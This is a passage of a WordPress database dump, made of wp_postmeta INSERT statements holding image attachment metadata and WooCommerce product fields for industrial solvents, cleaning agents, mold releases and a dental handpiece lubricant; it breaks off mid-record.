INSERT INTO `wp_postmeta` VALUES (14801, 1417, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:27:"2016/09/ms-755l-solvent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"ms-755l-solvent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"ms-755l-solvent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"ms-755l-solvent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"ms-755l-solvent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"ms-755l-solvent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"ms-755l-solvent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"ms-755l-solvent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"ms-755l-solvent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14802, 1418, '_wp_attached_file', '2016/09/ms-755-vertrel-smt-solvent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14803, 1418, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:38:"2016/09/ms-755-vertrel-smt-solvent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"ms-755-vertrel-smt-solvent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"ms-755-vertrel-smt-solvent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"ms-755-vertrel-smt-solvent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"ms-755-vertrel-smt-solvent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"ms-755-vertrel-smt-solvent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"ms-755-vertrel-smt-solvent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"ms-755-vertrel-smt-solvent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"ms-755-vertrel-smt-solvent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14804, 1419, '_wp_attached_file', '2016/09/ms-760-cleaning-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14805, 1419, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:33:"2016/09/ms-760-cleaning-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"ms-760-cleaning-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"ms-760-cleaning-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"ms-760-cleaning-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"ms-760-cleaning-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"ms-760-cleaning-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"ms-760-cleaning-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"ms-760-cleaning-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"ms-760-cleaning-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14806, 1420, '_wp_attached_file', '2016/09/ms-770-vertrel-mca-plus.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14807, 1420, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:35:"2016/09/ms-770-vertrel-mca-plus.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"ms-770-vertrel-mca-plus-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"ms-770-vertrel-mca-plus-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"ms-770-vertrel-mca-plus-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"ms-770-vertrel-mca-plus-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"ms-770-vertrel-mca-plus-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"ms-770-vertrel-mca-plus-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"ms-770-vertrel-mca-plus-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"ms-770-vertrel-mca-plus-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14808, 1421, '_wp_attached_file', '2016/09/ms-780-vertrel-xf-cleaning-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14809, 1421, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:44:"2016/09/ms-780-vertrel-xf-cleaning-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:44:"ms-780-vertrel-xf-cleaning-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:44:"ms-780-vertrel-xf-cleaning-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:44:"ms-780-vertrel-xf-cleaning-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:46:"ms-780-vertrel-xf-cleaning-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:44:"ms-780-vertrel-xf-cleaning-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:44:"ms-780-vertrel-xf-cleaning-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:44:"ms-780-vertrel-xf-cleaning-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:44:"ms-780-vertrel-xf-cleaning-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14810, 1422, '_wp_attached_file', '2016/09/releasys-82-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14811, 1422, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:51:"2016/09/releasys-82-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:51:"releasys-82-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:51:"releasys-82-semi-permanent-mold-release-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:51:"releasys-82-semi-permanent-mold-release-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:53:"releasys-82-semi-permanent-mold-release-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:51:"releasys-82-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:51:"releasys-82-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:51:"releasys-82-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:51:"releasys-82-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14812, 1423, '_wp_attached_file', '2016/09/releasys-85-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14813, 1423, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:51:"2016/09/releasys-85-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:51:"releasys-85-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:51:"releasys-85-semi-permanent-mold-release-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:51:"releasys-85-semi-permanent-mold-release-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:53:"releasys-85-semi-permanent-mold-release-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:51:"releasys-85-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:51:"releasys-85-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:51:"releasys-85-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:51:"releasys-85-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14814, 1424, '_wp_attached_file', '2016/09/releasys-88-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14815, 1424, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:51:"2016/09/releasys-88-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:51:"releasys-88-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:51:"releasys-88-semi-permanent-mold-release-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:51:"releasys-88-semi-permanent-mold-release-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:53:"releasys-88-semi-permanent-mold-release-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:51:"releasys-88-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:51:"releasys-88-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:51:"releasys-88-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:51:"releasys-88-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14816, 1425, '_wp_attached_file', '2016/09/releasys-89-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14817, 1425, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:51:"2016/09/releasys-89-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:51:"releasys-89-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:51:"releasys-89-semi-permanent-mold-release-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:51:"releasys-89-semi-permanent-mold-release-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:53:"releasys-89-semi-permanent-mold-release-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:51:"releasys-89-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:51:"releasys-89-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:51:"releasys-89-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:51:"releasys-89-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14818, 1384, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14819, 1384, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14820, 1384, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202">Boiling Point</td>\r\n<td style="text-align: center;" width="224">95°F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Liquid Density</td>\r\n<td style="text-align: center;">1.28 g/ml @77°F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14821, 1384, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14822, 1384, '716_default_editor', '<ul>\r\n 	<li>Removes Organic Flux</li>\r\n 	<li>Ionic Salt &amp; Oils</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14823, 1384, '719_default_editor', '<ul>\r\n 	<li>No ODC</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14824, 1384, '318_custom_list_file', 'a:1:{s:32:"fdbfc6ea5e9dfc51649c8906bdf30799";a:3:{s:4:"name";s:14:"MS 555/557 PDF";s:4:"file";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-555-557.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14825, 1384, '317_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202">Aerosol (MS-555)</td>\r\n<td style="text-align: center;" width="224">Bulk (MS-557)</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">1-</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">8 oz.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Quart</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Gallon</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">5 Gallons</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">55 Gallons</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14826, 1384, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14827, 1384, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14828, 1384, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14829, 1384, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14830, 1384, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14831, 1384, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14832, 1384, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14833, 1384, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14834, 1384, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14835, 1384, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14836, 1384, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14837, 1384, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14838, 1384, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14839, 1384, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14840, 1384, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14841, 1384, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14842, 1384, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14843, 1384, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14844, 1384, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14845, 1384, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14846, 1384, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14847, 1384, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14848, 1384, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14849, 1384, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (14850, 1384, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14851, 1384, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14852, 1384, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14853, 1384, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14854, 1384, '_product_image_gallery', '1762'); 
INSERT INTO `wp_postmeta` VALUES (14855, 474, '1367_default_editor', '<p class="Body"><strong><span class="C-12">FluoroExtreme™ MS-<wbr />4130DA and MS-<wbr />4010DA</span></strong></p>\r\n<p class="Body"><span class="C-8">FluoroExtreme™ MS-<wbr />4130DA comes available in 8oz and 12oz. non-flammable aerosol for both manual cleaning and 12-<wbr />14 oz cans for automated handpiece cleaning systems.</span></p>\r\n<p class="Body"><span class="C-8">FluoroExtreme™ MS-<wbr />4010DA is a simple, one-<wbr />step lubricant / cleaner for all dental handpieces available as a 0.5 fl oz. syringe-<wbr />tipped dropper bottle.</span></p>'); 
INSERT INTO `wp_postmeta` VALUES (14856, 1428, '_edit_lock', '1487963547:2'); 
INSERT INTO `wp_postmeta` VALUES (14857, 1428, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14858, 1429, '_wp_attached_file', '2016/09/PCA.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14859, 1430, '_wp_attached_file', '2016/09/krytox-fluoroguard-pca-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14860, 1430, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2475;s:6:"height";i:1650;s:4:"file";s:38:"2016/09/krytox-fluoroguard-pca-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"krytox-fluoroguard-pca-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"krytox-fluoroguard-pca-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"krytox-fluoroguard-pca-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"krytox-fluoroguard-pca-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"krytox-fluoroguard-pca-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"krytox-fluoroguard-pca-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"krytox-fluoroguard-pca-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s: